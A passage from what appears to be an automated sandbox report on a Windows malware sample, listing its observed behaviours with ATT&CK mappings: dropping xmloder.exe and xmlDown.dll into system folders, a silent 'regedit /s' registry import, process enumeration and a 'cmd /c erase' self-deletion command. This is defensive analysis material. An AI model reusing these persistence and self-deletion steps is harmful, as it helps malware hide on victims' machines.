"\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000090f512005f617577e87326000200000010000000ccf51200c086ba766d617577ffffffff02000000f02524da4cb77e8e5d44798eda7333c647c6af965d6cc5a34c1be2a639e4f6b519c6ef30567e1ca17b250bee86352ec887e7d24c9870d8accbb9a259aec18955c7e8637721aeca27f2204fdfab0279eb01087907f125d306fc72553a77e60d827125c2fad2d8c1a62193eb8e4a844f435053af5e83545066c697d9cf5c064265b54e4c49c35ff0508a3e536013c25765721c055338e19d473e05b869d2ff90a94333a361c32339ae35282f4df069ce4cfa73deb4 (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-89", "type": 1, "relevance": 3, "name": "Contains ability to enumerate files inside a directory", "description": "FindFirstFileA@KERNEL32.DLL at 00000000-00005684-5009-74-00403E54", "origin": "Hybrid Analysis Technology", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-71", "type": 1, "relevance": 1, "name": "Contains ability to query local/system time as file time", "description": "FileTimeToLocalFileTime@KERNEL32.DLL at 00000000-00005684-5009-74-00403E54", "origin": "Hybrid Analysis Technology", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-79", "type": 1, "relevance": 3, "name": "Contains ability to retrieve system language", "description": "GetKeyboardType@USER32.DLL at 00000000-00005684-5009-319-0040280C", "origin": "Hybrid Analysis Technology", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-49", "type": 1, "relevance": 1, "name": "Contains ability to query the system locale", "description": "GetLocaleInfoA@KERNEL32.DLL at 00000000-00005684-5009-232-00403528", "origin": "Hybrid Analysis Technology", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"FindFirstFileA\" with parameter %WINDIR%\\Debug\\xmlDown.dll (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-177", "relevance": 1, "name": "Contains ability to retrieve class object from a DLL object handler", "description": "\"xmlDown.dll\" contains export function called \"DllGetClassObject\" at ordinal 6", "origin": "Static Parser", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"FindNextFileW\" (Indicator: \"FindNextFile\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-82", "type": 2, "relevance": 1, "name": "Contains ability to retrieves the class object from a DLL object handler (API string)", "description": "Found reference to API \"DllGetClassObject\" (Indicator: \"DllGetClassObject\"; File: \"00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"DllGetClassObject\" (Indicator: \"DllGetClassObject\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetEnvironmentVariableA\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"]#.bg\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-210", "type": 2, "relevance": 1, "name": "Contains ability to create/connect to a named pipe (API string)", "description": "Found reference to API \"GetNamedPipeInfo\" (Indicator: \"GetNamedPipe\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"GetNamedPipeInfo\" (Indicator: \"GetNamedPipe\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00005684-00000C29-61650267\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.6684238469181425", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor edi\n esi in Stream UID: 2599-51-0044A0E8\n Assembly shows XOR instruction xor dword ptr [ebp-08h]\n 50455249h in Stream UID: 00000000-00005684-5009-71-00403980\n Assembly shows XOR instruction xor dh\n al in Stream UID: 00000000-00005684-5009-1587-004010BA\n Assembly shows XOR instruction xor esi\n dword ptr [edx] in Stream UID: 00000000-00005684-5009-1587-004010BA\n Assembly shows XOR instruction xor ch\n byte ptr [esi] in Stream UID: 00000000-00005684-5009-1587-004010BA", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Dropped file has high entropy (likely encrypted/compressed content)\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Contains ability to communicate with network (API string)", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xfshejg.reg\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\iyail.bat\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xfshejg.reg\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\iyail.bat\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "stream-32", "type": 1, "relevance": 1, "name": "Contains ability to find and load resources of a specific module", "description": "FindResourceA@KERNEL32.DLL at 00000000-00005684-5009-69-00403A50", "origin": "Hybrid Analysis Technology", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has an entrypoint in section \".perplex\"\n \"xmloder.exe\" has an entrypoint in section \".perplex\"\n \"xmlDown.dll\" has an entrypoint in section \".perplex\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "GetProcAddress\n GetModuleHandleA\n LoadLibraryA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" wrote 62464 bytes starting with PE header signature to file \"C:\\Windows\\debug\\xmlDown.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xmloder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\xmloder.exe]- [targetUID: 00000000-00005684]\n \"xmlDown.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\debug\\xmlDown.dll]- [targetUID: 00000000-00005684]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1\" has section name .data with entropy \"7.95673928714\"\n \"xmloder.exe\" has section name .data with entropy \"7.95673928714\"\n \"xmlDown.dll\" has section name .data with entropy \"7.91947951738\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "stream-121", "type": 1, "relevance": 5, "name": "Contains ability to retrieve a module handle", "description": "GetModuleHandleA@KERNEL32.DLL at 00000000-00005684-5009-80-00403788", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "stream-133", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure", "description": "GetStartupInfoA@KERNEL32.DLL at 00000000-00005684-5009-317-00401098", "origin": "Hybrid Analysis Technology", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "target-423", "type": 9, "relevance": 5, "name": "Tries to access/write temporary files", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" with commandline \"/c %TEMP%\\\\iyail.bat\" (UID: 00000000-00005116)", "origin": "Monitored Target", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-131", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the fully qualified path of module", "description": "GetModuleFileNameA@KERNEL32.DLL at 00000000-00005684-5009-67-00402678", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-118", "type": 1, "relevance": 3, "name": "Contains ability to retrieve the command-line string for the current process", "description": "GetCommandLineA@KERNEL32.DLL at 00000000-00005684-5009-67-00402678\n GetCommandLineA@KERNEL32.DLL at 00000000-00005684-5009-33-0042C6D4\n GetCommandLineA@KERNEL32.DLL at 00000000-00005684-5009-316-00403607", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%WINDIR%\\System32\\xmloder.exe\" has high entropy 7.6684238469181425", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "target-118", "type": 9, "relevance": 7, "name": "Uses REGEDIT.EXE to add Windows registry data file", "description": "Process \"regedit.exe\" with commandline \"regedit /s %TEMP%\\\\xfshejg.reg\" (UID: 00000000-00006048)", "origin": "Monitored Target", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "stream-88", "type": 1, "relevance": 1, "name": "Contains ability to terminate a process", "description": "ExitProcess@KERNEL32.DLL at 00000000-00005684-5009-39-00402FA8", "origin": "Hybrid Analysis Technology", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-120", "type": 6, "relevance": 10, "name": "Calls an API typically used to run the specified application", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"WinExec\" with parameter cmd /c erase /F \"C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" allocated memory in \"C:\\070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%WINDIR%\\System32\\xmloder.exe\"\n File type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\" was dropped at 